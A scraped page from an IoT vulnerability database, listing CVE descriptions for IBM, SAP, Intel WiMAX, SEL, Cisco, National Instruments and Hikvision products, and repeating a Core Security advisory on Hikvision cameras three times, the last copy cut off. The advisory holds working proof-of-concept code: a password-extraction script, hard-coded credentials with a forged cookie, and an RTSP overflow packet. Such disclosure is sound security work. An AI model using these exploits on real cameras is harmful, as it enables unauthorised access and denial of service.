VARIoT IoT vulnerabilities database

The Intelligent Platform Management Interface (IPMI) implementation in Integrated Management Module (IMM) and Integrated Management Module II (IMM2) on IBM BladeCenter, Flex System, System x iDataPlex, and System x3### servers has a default password for the IPMI user account, which makes it easier for remote attackers to perform power-on, power-off, or reboot actions, or add or modify accounts, via unspecified vectors. System X3250 M4 is prone to a denial-of-service vulnerability

SQL injection vulnerability in SAP BI Universal Data Integration allows remote attackers to execute arbitrary SQL commands via unspecified vectors, related to the J2EE schema. SAP BI Universal Data Integration is a universal data analysis interface for SAP BI solutions from SAP SAP. User-provided input that was not properly filtered by the program before the SQL query was used. Exploiting these issues could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database

Multiple integer overflows in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices allow remote attackers to cause a denial of service (component crash) or possibly execute arbitrary code via an L5 connection with a crafted PDU value that triggers a heap-based buffer overflow within (1) L5SocketsDispatcher.c or (2) L5Connector.c. wimax-ns is prone to multiple security vulnerabilities including; 1. An insecure file-permission issue 2. Multiple information-disclosure issues 3. Multiple buffer-overflow issues Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. Intel WiMAX Network Service is a network service of Intel Corporation that integrates 802.16 wireless metropolitan area network technology. These vulnerabilities are caused by the fact that the socket dispatcher and connector modules of the L5 connection do not filter when processing payload data units (PDUs) Input submitted by the user

The InitMethodAndPassword function in InfraStack/OSAgnostic/WiMax/Agents/Supplicant/Source/SupplicantAgent.c in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices uses the same RSA private key in supplicant_key.pem on all systems, which allows local users to obtain sensitive information via unspecified decryption operations. wimax-ns is prone to multiple security vulnerabilities including; 1. An insecure file-permission issue 2. Multiple information-disclosure issues 3. Multiple buffer-overflow issues Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. A local attacker could exploit this vulnerability to obtain sensitive information through a decrypt operation

The OSAL_Crypt_SetEncryptedPassword function in InfraStack/OSDependent/Linux/OSAL/Services/wimax_osal_crypt_services.c in the OSAL crypt module in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices logs a cleartext password during certain attempts to set a password, which allows local users to obtain sensitive information by reading a log file. wimax-ns is prone to multiple security vulnerabilities including; 1. An insecure file-permission issue 2. Multiple information-disclosure issues 3. Multiple buffer-overflow issues Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition. Intel WiMAX Network Service is a network service of Intel Corporation that integrates 802.16 wireless metropolitan area network technology. A local attacker could exploit this vulnerability to obtain sensitive information by reading log files

The Trace_OpenLogFile function in InfraStack/OSDependent/Linux/InfraStackModules/TraceModule/TraceModule.c in the Trace module in the Intel WiMAX Network Service through 1.5.2 for Intel Wireless WiMAX Connection 2400 devices uses world-writable permissions for wimaxd.log, which allows local users to cause a denial of service (data corruption) by modifying this file. wimax-ns is prone to multiple security vulnerabilities including; 1. An insecure file-permission issue 2. Multiple information-disclosure issues 3. Multiple buffer-overflow issues Attackers can exploit these issues to disclose sensitive information and execute arbitrary code on the affected device. Failed exploit attempts will result in a denial-of-service condition

Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL-3530 RTAC master devices allow remote attackers to cause a denial of service (infinite loop) via a crafted DNP3 TCP packet. Schweitzer Engineering Laboratories is a leading manufacturer in Washington State, USA, and is a leader in power system relay protection, control, monitoring, metering and SCADA. Under certain conditions, the DNP3 driver will automatically restart and resume communication, but in severe cases, the device ALARM contact will trigger an assertion and need to reload the device driver settings. The affected products are as follows: SEL-3530-R100 -V0-Z001001-D20090915 - SEL-3530- SEL-3530-R123-V0-Z002001SEL-3530-4-R107-V0-Z001001-D20100818 - SEL-3530-4-R123 -V0-Z002001-D20130117SEL-3505-R119-V0-Z001001-D20120720 - SEL-3505-R123-V0-Z002001-D20130117SEL-2241-R113-V0-Z001001-D20110721 - SEL-2241-R123-V0-Z002001-D20130117. Multiple Schweitzer Engineering Laboratories devices are prone to a remote denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. Note: This issue affects the IP connected devices

Schweitzer Engineering Laboratories (SEL) SEL-2241, SEL-3505, and SEL-3530 RTAC master devices allow physically proximate attackers to cause a denial of service (infinite loop) via crafted input over a serial line. Schweitzer Engineering Laboratories is a leading manufacturer in Washington State, USA, and is a leader in power system relay protection, control, monitoring, metering and SCADA. Under certain conditions, the DNP3 driver will automatically restart and resume communication, but in severe cases, the device ALARM contact will trigger an assertion and need to reload the device driver settings. The affected products are as follows: SEL-3530-R100 -V0-Z001001-D20090915 - SEL-3530- SEL-3530-R123-V0-Z002001SEL-3530-4-R107-V0-Z001001-D20100818 - SEL-3530-4-R123 -V0-Z002001-D20130117SEL-3505-R119-V0-Z001001-D20120720 - SEL-3505-R123-V0-Z002001-D20130117SEL-2241-R113-V0-Z001001-D20110721 - SEL-2241-R123-V0-Z002001-D20130117. Schweitzer Engineering Laboratories multiple devices are prone to a local denial-of-service vulnerability. An attacker can exploit this issue to crash the affected device, denying service to legitimate users. NOTE: To exploit this issue, local access to the serial-based outstation is required

Cisco TelePresence System Software 1.10.1 and earlier on 500, 13X0, 1X00, 30X0, and 3X00 devices, and 6.0.3 and earlier on TX 9X00 devices, has a default password for the pwrecovery account, which makes it easier for remote attackers to modify the configuration or perform arbitrary actions via HTTPS requests, aka Bug ID CSCui43128. Vendors report this vulnerability Bug ID CSCui43128 Published as.By a third party, HTTPS Via request, settings may be changed or arbitrary actions may be taken. Cisco TelePresence System Software is prone to an unauthorized-access vulnerability Attackers can exploit this issue to gain unauthorized administrative access to affected system. This may aid in further attacks. This issue is being tracked by Cisco Bug ID CSCui43128. Cisco TelePresence is a set of video conferencing solutions called "TelePresence" system of Cisco (Cisco). The solution provides components such as audio and video spaces, which can provide remote participants with a "face-to-face" virtual meeting room effect. A remote attacker can exploit this vulnerability to modify the configuration or perform arbitrary operations through HTTPS requests

Cross-site scripting (XSS) vulnerability in afa/php/Login.php in AlgoSec Firewall Analyzer 6.1-b86 allows remote attackers to inject arbitrary web script or HTML via the PATH_INFO. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. AlgoSec Firewall Analyzer 6.1-b86 is affected; other versions may also be vulnerable. AlgoSec Firewall Analyzer (AFA) is a set of firewall analysis solutions from AlgoSec Company in the United States. The solution supports automatic detection of security loopholes in firewall policies. A cross-site scripting vulnerability exists in the afa/php/Login.php script in version 6.1-b86 of AFA

The NTT DOCOMO overseas usage application 2.0.0 through 2.0.4 for Android does not properly connect to Wi-Fi access points, which allows remote attackers to obtain sensitive information by leveraging presence in an 802.11 network's coverage area. docomo overseas usage is prone to an information-disclosure vulnerability. Attackers can exploit this issue to disclose potentially sensitive information through man-in-the-middle attacks. This may aid in further attacks. docomo overseas usage 2.0.0 through versions 2.0.4 are vulnerable

An ActiveX control in NationalInstruments.Help2.dll in National Instruments NI .NET Class Library Help, as used in Measurement Studio 2013 and earlier and other products, allows remote attackers to obtain sensitive information about the existence of registry keys via crafted (1) key-open or (2) key-close method calls. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage. The impact of this issue is currently unknown. We will update this BID as more information becomes available

The ActiveX controls in the HelpAsst component in NI Help Links in National Instruments LabWindows/CVI 2012 SP1 and earlier, LabVIEW 2012 SP1 and earlier, and other products allow remote attackers to cause a denial of service by triggering the display of local .chm files. Attackers may exploit this issue by enticing an unsuspecting victim to view a malicious webpage. The impact of this issue is currently unknown. We will update this BID as more information becomes available. The following products are affected: Diadem 2012 and prior LabVIEW 2012 and prior LabWindows/CVI 2012 and prior Measurement Studio 2013 and prior TestStand 2012 and prior

Absolute path traversal vulnerability in the 3D Graph ActiveX control in cw3dgrph.ocx in National Instruments LabWindows/CVI 2012 SP1 and earlier, LabVIEW 2012 SP1 and earlier, and other products allows remote attackers to create and execute arbitrary files via a full pathname in an argument to the ExportStyle method, in conjunction with file content in the (1) Caption or (2) FormatString property value. Attackers can exploit this issue to create and execute arbitrary files in the context of the application (typically Internet Explorer) that is using the ActiveX control, which may aid in a remote code execution. The following products are affected: LabVIEW 2012 and prior LabWindows/CVI 2012 and prior Measurement Studio 2013 and prior TestStand 2012 and prior

Hikvision DS-2CD7153-E IP Camera has Privilege Escalation. Hikvision DS-2CD7153-E IP Camera Contains a privilege management vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Hikvision DS-2CD7153-E IP Camera device multiple scripts have security vulnerabilities that allow authenticated remote attackers to submit special requests for administrative password information and enhance privileges. An attacker can exploit this issue to gain elevated privileges on affected devices. Hikvision DS-2CD7153-E IP camera running firmware 4.1.0 b130111 is vulnerable; others may also be affected. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Hikvision IP Cameras Multiple Vulnerabilities 1. *Advisory Information* Title: Hikvision IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0708 Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities Date published: 2013-08-06 Date of last update: 2013-08-06 Vendors contacted: Hikvision Release mode: User release 2. *Vulnerability Information* Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977 3. [CVE-2013-4975] To obtain the admin password from a non-privileged user account. 2. [CVE-2013-4976] To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled). 3. [CVE-2013-4977] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler. 4. *Vulnerable Packages* . Other devices based on the same firmware [2] are probably affected too, but they were not checked. 5. *Vendor Information, Solutions and Workarounds* There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to internet unless absolutely necessary. Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'. Have at least one proxy filtering the 'Range' parameter in RTSP requests. 6. *Credits* . [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security. [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team. [CVE-2013-4977] was discovered Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation through ConfigurationData Request* [CVE-2013-4975] The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack. /----- import urllib2 import base64 import argparse import sys def decrypt(config): # Important: We're assuming the last 4 bytes of the file's plaintext are # zero, hence there we have the key. There are other easy ways to # calculate this tho. print '[*] Decrypting config' key = config[-4:] plaintext = '' for i in range(len(config)/4): for j in range(4): plaintext += chr(ord(config[i*4+j]) ^ ord(key[j])) return plaintext def attack(target, username, password, output): base_url = 'http://' + target + '/PSIA/System/ConfigurationData' headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) } print '[*] Attacking %s ' % target req = urllib2.Request(base_url, None, headers) try: response = urllib2.urlopen(req) config = response.read() except Exception, e: print e return plaintext = decrypt(config) print '[*] Writing output file %s' % output f = open(output, 'w') f.write(plaintext) f.close() user = plaintext[0x45A0:0x45A0+32] pwd = plaintext[0x45C0:0x45C0+16] print 'Probably the admin user is %s and the password is %s' % (user, pwd) print "If it doesn't make any sense, just do a strings of the output file" if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('target', action = 'store', help = 'target host to attack') parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target') parser.add_argument('password', action = 'store', help = "username's password") parser.add_argument('output', action = 'store', help = "filename to write the plaintext config") if len(sys.argv) == 1: parser.print_help() sys.exit(1) options = parser.parse_args() attack(options.target, options.username, options.password, options.output) -----/ 7.2. *Anonymous User Authentication Bypass* [CVE-2013-4976] The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it could be bypassed due to the usage of hardcoded credentials: /----- user: anonymous password: \177\177\177\177\177\177 -----/ The bypass cannot be used directly through the login form but rather by forging a cookie: 1. Load the login page to generate the initial cookies of the camera's webapp. 2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the tuple 'user:pass' encoded in base64 explained above. 3. Request the URI 'http:/<ipcam>/doc/pages/main.asp', a page that should not be accessed without authentication if the anonymous user is disabled. There are several references to those hardcoded credentials in the cgis, but in particular the following snippet was found in '/doc/pages/scripts/login.js':: /----- 107: function DoLogin(){ (...) 166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue); (...) -----/ This bypass is not completely useful per se since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance's) API. Nevertheless, if it is ever combined with a privilege escalation it would allow remote attacker to control the camera without proper credentials. 7.3. *Buffer Overflow in the RTSP Packet Handler* [CVE-2013-4977] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of a RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it would possible lead to a remote code execution. /----- import socket HOST = '192.168.1.100' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST trigger_pkt += "CSeq: 7\r\n" trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" s.sendall(trigger_pkt) print "Packet sent" data = s.recv(1024) print 'Received', repr(data), "\r\n" s.close() -----/ 8. *Report Timeline* . 2013-07-08: Core attempts to report the vulnerability using the Hikvision official contact addresses [3]. No reply received. 2013-07-15: Core attempts to contact vendor. 2013-07-22: Core attempts to contact vendor. 2013-07-30: Core attempts to contact vendor. 2013-08-06: Advisory CORE-2013-0708 published as 'user release'. 9. *References* [1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506. [3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

Hikvision DS-2CD7153-E IP Camera has security bypass via hardcoded credentials. Hikvision DS-2CD7153-E IP Camera Contains an authentication vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. Hikvision DS-2CD7153-E IP Camera is a webcam product. The Hikvision DS-2CD7153-E IP Camera device has an anonymous account for the Guest user. The username is: anonymous password is 177177177177177177. Even if this feature is disabled, you can bypass the restriction to submit an unauthorized request to control the camera. An attacker can leverage this issue to gain access to the vulnerable device. NOTE: Other camera devices running firmware 4.1.0 b130111 may also be affected. *Advisory Information* Title: Hikvision IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0708 Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities Date published: 2013-08-06 Date of last update: 2013-08-06 Vendors contacted: Hikvision Release mode: User release 2. *Vulnerability Information* Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977 3. *Vulnerability Description* Multiple vulnerabilities have been found in Hikvision IP camera DS-2CD7153-E [1] (and potentially other cameras sharing the affected firmware [2]) that could allow a remote attacker: 1. [CVE-2013-4975] To obtain the admin password from a non-privileged user account. 2. 3. [CVE-2013-4977] To execute arbitrary code without authentication by exploiting a buffer overflow in the RTSP packet handler. 4. *Vulnerable Packages* . 5. *Vendor Information, Solutions and Workarounds* There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to internet unless absolutely necessary. Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'. Have at least one proxy filtering the 'Range' parameter in RTSP requests. 6. *Credits* . [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security. [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team. [CVE-2013-4977] was discovered Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation through ConfigurationData Request* [CVE-2013-4975] The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack. /----- import urllib2 import base64 import argparse import sys def decrypt(config): # Important: We're assuming the last 4 bytes of the file's plaintext are # zero, hence there we have the key. There are other easy ways to # calculate this tho. print '[*] Decrypting config' key = config[-4:] plaintext = '' for i in range(len(config)/4): for j in range(4): plaintext += chr(ord(config[i*4+j]) ^ ord(key[j])) return plaintext def attack(target, username, password, output): base_url = 'http://' + target + '/PSIA/System/ConfigurationData' headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) } print '[*] Attacking %s ' % target req = urllib2.Request(base_url, None, headers) try: response = urllib2.urlopen(req) config = response.read() except Exception, e: print e return plaintext = decrypt(config) print '[*] Writing output file %s' % output f = open(output, 'w') f.write(plaintext) f.close() user = plaintext[0x45A0:0x45A0+32] pwd = plaintext[0x45C0:0x45C0+16] print 'Probably the admin user is %s and the password is %s' % (user, pwd) print "If it doesn't make any sense, just do a strings of the output file" if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('target', action = 'store', help = 'target host to attack') parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target') parser.add_argument('password', action = 'store', help = "username's password") parser.add_argument('output', action = 'store', help = "filename to write the plaintext config") if len(sys.argv) == 1: parser.print_help() sys.exit(1) options = parser.parse_args() attack(options.target, options.username, options.password, options.output) -----/ 7.2. Load the login page to generate the initial cookies of the camera's webapp. 2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the tuple 'user:pass' encoded in base64 explained above. 3. Request the URI 'http:/<ipcam>/doc/pages/main.asp', a page that should not be accessed without authentication if the anonymous user is disabled. There are several references to those hardcoded credentials in the cgis, but in particular the following snippet was found in '/doc/pages/scripts/login.js':: /----- 107: function DoLogin(){ (...) 166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue); (...) -----/ This bypass is not completely useful per se since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance's) API. Nevertheless, if it is ever combined with a privilege escalation it would allow remote attacker to control the camera without proper credentials. 7.3. *Buffer Overflow in the RTSP Packet Handler* [CVE-2013-4977] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of a RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it would possible lead to a remote code execution. /----- import socket HOST = '192.168.1.100' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST trigger_pkt += "CSeq: 7\r\n" trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" s.sendall(trigger_pkt) print "Packet sent" data = s.recv(1024) print 'Received', repr(data), "\r\n" s.close() -----/ 8. *Report Timeline* . 2013-07-08: Core attempts to report the vulnerability using the Hikvision official contact addresses [3]. No reply received. 2013-07-15: Core attempts to contact vendor. 2013-07-22: Core attempts to contact vendor. 2013-07-30: Core attempts to contact vendor. 2013-08-06: Advisory CORE-2013-0708 published as 'user release'. 9. *References* [1] Hikvision DS-2CD7153-E Network Mini Dome Camera, http://www.hikvision.com/en/products_show.asp?id=506. [3] Hikvision contact page, http://www.hikvision.com/En/US/contactHikvision.asp. 10. *About CoreLabs* CoreLabs, the research center of Core Security Technologies, is charged with anticipating the future needs and requirements for information security technologies. We conduct our research in several important areas of computer security including system vulnerabilities, cyber attack planning and simulation, source code auditing, and cryptography. Our results include problem formalization, identification of vulnerabilities, novel solutions and prototypes for new technologies. CoreLabs regularly publishes security advisories, technical papers, project information and shared software tools for public use at: http://corelabs.coresecurity.com. 11. *About Core Security Technologies* Core Security Technologies enables organizations to get ahead of threats with security test and measurement solutions that continuously identify and demonstrate real-world exposures to their most critical assets. Our customers can gain real visibility into their security standing, real validation of their security controls, and real metrics to more effectively secure their organizations. Core Security's software solutions build on over a decade of trusted research and leading-edge threat expertise from the company's Security Consulting Services, CoreLabs and Engineering groups. Core Security Technologies can be reached at +1 (617) 399-6980 or on the Web at: http://www.coresecurity.com. 12. *Disclaimer* The contents of this advisory are copyright (c) 2013 Core Security Technologies and (c) 2013 CoreLabs, and are licensed under a Creative Commons Attribution Non-Commercial Share-Alike 3.0 (United States) License: http://creativecommons.org/licenses/by-nc-sa/3.0/us/ 13. *PGP/GPG Keys* This advisory has been signed with the GPG key of Core Security Technologies advisories team, which is available for download at http://www.coresecurity.com/files/attachments/core_security_advisories.asc

An ActiveX control in lookout650.ocx, lookout660.ocx, and lookout670.ocx in National Instruments Lookout 6.5 through 6.7 allows remote attackers to execute arbitrary code by triggering the download of, and calls to, an arbitrary DLL file. National Instruments Lookout of ActiveX The controls include lookout650.ocx , lookout660.ocx and lookout670.ocx Vulnerabilities that are unspecified are present due to incomplete processing.It may be affected unspecified. National Instruments Lookout is an easy-to-use HMI/SCADA software. The vulnerability is related to lookout650.ocx, lookout660.ocx and lookout670.ocx. The impact of this issue is currently unknown. We will update this BID as more information emerges

Buffer overflow in the RTSP Packet Handler in Hikvision DS-2CD7153-E IP camera with firmware 4.1.0 b130111 (Jan 2013), and possibly other devices, allows remote attackers to cause a denial of service (device crash and reboot) and possibly execute arbitrary code via a long string in the Range header field in an RTSP transaction. Hikvision DS-2CD7153-E IP Camera is a webcam product. Hikvision DS-2CD7153-E IP camera is prone to a buffer-overflow vulnerability because it fails to perform adequate boundary-checks on user-supplied data. An attacker can exploit this issue to execute arbitrary code within the context of the affected device. Failed exploit attempts may result in a denial-of-service condition. Hikvision DS-2CD7153-E IP camera running firmware 4.1.0 b130111 is vulnerable; other devices may also be affected. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ Hikvision IP Cameras Multiple Vulnerabilities 1. *Advisory Information* Title: Hikvision IP Cameras Multiple Vulnerabilities Advisory ID: CORE-2013-0708 Advisory URL: http://www.coresecurity.com/advisories/hikvision-ip-cameras-multiple-vulnerabilities Date published: 2013-08-06 Date of last update: 2013-08-06 Vendors contacted: Hikvision Release mode: User release 2. *Vulnerability Information* Class: Input validation error [CWE-20], Use of Hard-coded Credentials [CWE-798], Buffer overflow [CWE-119] Impact: Code execution, Security bypass Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-4975, CVE-2013-4976, CVE-2013-4977 3. [CVE-2013-4975] To obtain the admin password from a non-privileged user account. 2. [CVE-2013-4976] To bypass the anonymous user authentication using hard-coded credentials (even if the built-in anonymous user account was explicitly disabled). 3. 4. *Vulnerable Packages* . 5. *Vendor Information, Solutions and Workarounds* There was no official answer from Hikvision after several attempts (see [Sec. 8]); contact vendor for further information. Some mitigation actions may be: . Do not expose the camera to internet unless absolutely necessary. Have at least one proxy filtering HTTP requests to '/PSIA/System/ConfigurationData'. Have at least one proxy filtering the 'Range' parameter in RTSP requests. 6. *Credits* . [CVE-2013-4975] was discovered and researched by Alberto Solino from Core Security. [CVE-2013-4976] was discovered and researched by Alejandro Rodriguez from Core Exploit QA Team. [CVE-2013-4977] was discovered Anibal Sacco. Analysis and research by Anibal Sacco and Federico Muttis from Core Exploit Writers Team. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 7. *Technical Description / Proof of Concept Code* 7.1. *Privilege Escalation through ConfigurationData Request* [CVE-2013-4975] The following script allows obtaining the administrator password by requesting the camera's configuration data and breaking its trivial encryption. A valid user account is needed to launch the attack. /----- import urllib2 import base64 import argparse import sys def decrypt(config): # Important: We're assuming the last 4 bytes of the file's plaintext are # zero, hence there we have the key. There are other easy ways to # calculate this tho. print '[*] Decrypting config' key = config[-4:] plaintext = '' for i in range(len(config)/4): for j in range(4): plaintext += chr(ord(config[i*4+j]) ^ ord(key[j])) return plaintext def attack(target, username, password, output): base_url = 'http://' + target + '/PSIA/System/ConfigurationData' headers = { 'Authorization': 'Basic ' + base64.b64encode('%s:%s' %(username,password)) } print '[*] Attacking %s ' % target req = urllib2.Request(base_url, None, headers) try: response = urllib2.urlopen(req) config = response.read() except Exception, e: print e return plaintext = decrypt(config) print '[*] Writing output file %s' % output f = open(output, 'w') f.write(plaintext) f.close() user = plaintext[0x45A0:0x45A0+32] pwd = plaintext[0x45C0:0x45C0+16] print 'Probably the admin user is %s and the password is %s' % (user, pwd) print "If it doesn't make any sense, just do a strings of the output file" if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('target', action = 'store', help = 'target host to attack') parser.add_argument('username', action = 'store', help = 'username to be used to authenticate against target') parser.add_argument('password', action = 'store', help = "username's password") parser.add_argument('output', action = 'store', help = "filename to write the plaintext config") if len(sys.argv) == 1: parser.print_help() sys.exit(1) options = parser.parse_args() attack(options.target, options.username, options.password, options.output) -----/ 7.2. *Anonymous User Authentication Bypass* [CVE-2013-4976] The camera has a built-in anonymous account intended for guest users, but even when the feature is disabled it could be bypassed due to the usage of hardcoded credentials: /----- user: anonymous password: \177\177\177\177\177\177 -----/ The bypass cannot be used directly through the login form but rather by forging a cookie: 1. Load the login page to generate the initial cookies of the camera's webapp. 2. Use your preferred tool (for example Firebug on Firefox) to create a cookie with the name 'userInfoXX' (replace XX with the port where the webserver is running i.e. 'userInfo80'), path '/' and value 'YW5vbnltb3VzOlwxNzdcMTc3XDE3N1wxNzdcMTc3XDE3Nw=='; this is the tuple 'user:pass' encoded in base64 explained above. 3. Request the URI 'http:/<ipcam>/doc/pages/main.asp', a page that should not be accessed without authentication if the anonymous user is disabled. There are several references to those hardcoded credentials in the cgis, but in particular the following snippet was found in '/doc/pages/scripts/login.js':: /----- 107: function DoLogin(){ (...) 166: $.cookie('userInfo'+m_lHttpPort,m_szUserPwdValue==""?Base64.encode("anonymous:\177\177\177\177\177\177" ):m_szUserPwdValue); (...) -----/ This bypass is not completely useful per se since all the interesting requests are actually handled by the PSIA (Physical Security Interoperability Alliance's) API. Nevertheless, if it is ever combined with a privilege escalation it would allow remote attacker to control the camera without proper credentials. 7.3. *Buffer Overflow in the RTSP Packet Handler* [CVE-2013-4977] The following Python script sends a specially crafted packet that triggers a buffer overrun condition when handling the 'Range' parameter of a RTSP transaction. As a result, the process handling the communication crashes and the Watchdog service issues a full restart. No authentication is required to exploit this vulnerability and it would possible lead to a remote code execution. /----- import socket HOST = '192.168.1.100' PORT = 554 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) s.connect((HOST, PORT)) trigger_pkt = "PLAY rtsp://%s/ RTSP/1.0\r\n" % HOST trigger_pkt += "CSeq: 7\r\n" trigger_pkt += "Range: npt=Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9aLSaLSaLS\r\n" trigger_pkt += "User-Agent: VLC media player (LIVE555 Streaming Media v2010.02.10)\r\n\r\n" s.sendall(trigger_pkt) print "Packet sent" data = s.recv(1024) print 'Received', repr(data), "\r\n" s.close() -----/ 8. *Report Timeline* . 2013-07-08: Core attempts to report the vulnerability using the 